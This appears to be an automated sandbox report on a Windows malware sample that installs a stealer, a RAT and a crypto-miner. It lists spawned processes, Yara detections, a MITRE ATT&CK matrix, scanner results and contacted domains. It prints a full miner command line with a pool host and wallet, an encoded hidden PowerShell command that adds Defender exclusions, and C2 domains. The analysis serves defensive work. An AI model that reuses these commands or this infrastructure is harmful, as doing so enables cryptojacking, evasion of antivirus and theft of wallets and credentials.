Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9052 -ip 9052
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9052 -s 1740

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaeqaeqbsageabgblafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabbahiazwb1ag0azqbuahqaqwbvahuabgb0afwaqwb1ahiacgblag4adaauaguaeablacwaqwa6afwavwbpag4azabvahcacwbcae0aaqbjahiabwbzag8azgb0ac4atgbfafqaxabgahiayqbtaguadwbvahiaawa2adqaxab2adqalgawac4amwawadmamqa5afwaqqbkagqasqbuafaacgbvagmazqbzahmalgblahgazqasaemaogbcafuacwblahiacwbcaeqaeqbsageabgblafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxaagac0argbvahiaywbladsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaaqwa6afwavwbpag4azabvahcacwbcae0aaqbjahiabwbzag8azgb0ac4atgbfafqaxabgahiayqbtaguadwbvahiaawa2adqaxab2adqalgawac4amwawadmamqa5afwaqqbkagqasqbuafaacgbvagmazqbzahmalgblahgazqasaemaogbcafuacwblahiacwbcaeqaeqbsageabgblafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabbahiazwb1ag0azqbuahqaqwbvahuabgb0afwaqwb1ahiacgblag4adaauaguaeablaa==

Source: glmIOFfdMi.exe, 00000006.00000002.378495044726.000000000586D000.00000004.00000020.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: glmIOFfdMi.exe, 00000006.00000002.378495044726.000000000586D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerj
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004077E0 cpuid

5_2_004077E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_0041E825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_00414138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_0041EA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_0041EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	5_2_0041E412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_0041ECA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_0041ED76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_0041465E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	5_2_0041E60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_0041E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_0041E6B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	5_2_0041E79A

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Queries volume information: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Queries volume information: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Queries volume information: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Queries volume information: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Queries volume information: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\l6E.exe	Queries volume information: C:\Users\user\AppData\Roaming\l6E.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004079F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_004079F4

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: PT54FFSL7ET46RASB.exe, 00000000.00000002.375886817379.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, l6E.exe, 00000013.00000002.376205914890.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: PT54FFSL7ET46RASB.exe, 00000000.00000002.375886817379.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, l6E.exe, 00000013.00000002.376205914890.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: glmIOFfdMi.exe, 00000006.00000002.378366101247.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.378430242891.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.378430242891.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi\|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegAsm.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.378430242891.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.378430242891.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.3ce97a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.glmIOFfdMi.exe.73e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	331 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	512 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	244 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	22 Software Packing	NTDS	661 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	461 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	461 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	512 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PT54FFSL7ET46RASB.exe	34%	ReversingLabs	Win32.Trojan.Generic
PT54FFSL7ET46RASB.exe	100%	Joe Sandbox ML
PT54FFSL7ET46RASB.exe	38%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	100%	Avira	TR/Dropper.MSIL.Gen8
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	58%	ReversingLabs	ByteCode-MSIL.Dropper.Marsilia
C:\Users\user\AppData\Roaming\l6E.exe	29%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
2x.si	16%	Virustotal	Browse
pool.hashvault.pro	7%	Virustotal	Browse
strompreis.ru	3%	Virustotal	Browse
eemmbryequo.shop	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
tryyudjasudqo.shop	100%	Avira URL Cloud	malware
https://github.com/mgravell/protobuf-netJ	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
http://nuget.org/NuGet.exe	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/14436606/23354	0%	Avira URL Cloud	safe
http://nuget.org/NuGet.exe	0%	Virustotal		Browse
http://schemas.xmlsoap.org/soap/encoding/	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/14436606/23354	0%	Virustotal		Browse
http://pesterbdd.com/images/Pester.png	8%	Virustotal		Browse
tryyudjasudqo.shop	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://xmrig.com/wizard%s	0%	Avira URL Cloud	safe
reggwardssdqw.shop	100%	Avira URL Cloud	malware
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://contoso.com/License	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Avira URL Cloud	safe
licenseodqwmqn.shop	100%	Avira URL Cloud	malware
https://contoso.com/Icon	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-net	0%	Avira URL Cloud	safe
reggwardssdqw.shop	0%	Virustotal		Browse
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Virustotal		Browse
https://files.catbox.moe/kwfxr7.dll	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	Virustotal		Browse
licenseodqwmqn.shop	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Avira URL Cloud	safe
https://xmrig.com/wizard%s	2%	Virustotal		Browse
https://contoso.com/License	0%	Virustotal		Browse
https://xmrig.com/wizard	2%	Virustotal		Browse
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://files.catbox.moe/kwfxr7.dll	9%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	0%	Avira URL Cloud	safe
relaxatinownio.shop	100%	Avira URL Cloud	malware
keennylrwmqlw.shop	100%	Avira URL Cloud	malware
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-neti	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/2152978/23354rCannot	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	0%	Virustotal		Browse
https://stackoverflow.com/q/11564914/23354;	0%	Avira URL Cloud	safe
relaxatinownio.shop	0%	Virustotal		Browse
keennylrwmqlw.shop	0%	Virustotal		Browse
https://stackoverflow.com/q/2152978/23354	0%	Avira URL Cloud	safe
tesecuuweqo.shop	100%	Avira URL Cloud	malware
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
http://crl.glo	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/11564914/23354;	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	0%	Virustotal		Browse
http://schemas.xmlsoap.org/wsdl/	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/2152978/23354	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	0%	Virustotal		Browse
https://contoso.com/	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Avira URL Cloud	safe
tendencctywop.shop	100%	Avira URL Cloud	malware
https://stackoverflow.com/q/2152978/23354rCannot	0%	Virustotal		Browse
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/	0%	Virustotal		Browse
https://contoso.com/	0%	Virustotal		Browse
https://github.com/Pester/PesterXz	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	0%	Avira URL Cloud	safe
tesecuuweqo.shop	9%	Virustotal		Browse
https://xmrig.com/docs/algorithms	2%	Virustotal		Browse
https://aka.ms/pscore68	0%	Avira URL Cloud	safe
tendencctywop.shop	0%	Virustotal		Browse
https://files.catbox.moe/k541xr.dll	0%	Avira URL Cloud	safe
https://eemmbryequo.shop/api	100%	Avira URL Cloud	malware
https://xmrig.com/benchmark/%s	2%	Virustotal		Browse
https://2x.si/o3M.dllp	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
https://2x.si/o3M.dll	0%	Avira URL Cloud	safe
eemmbryequo.shop	100%	Avira URL Cloud	malware
https://github.com/Pester/PesterXz	0%	Virustotal		Browse
http://pesterbdd.com/images/Pester.pngXz	0%	Avira URL Cloud	safe
https://eemmbryequo.shop/api	17%	Virustotal		Browse
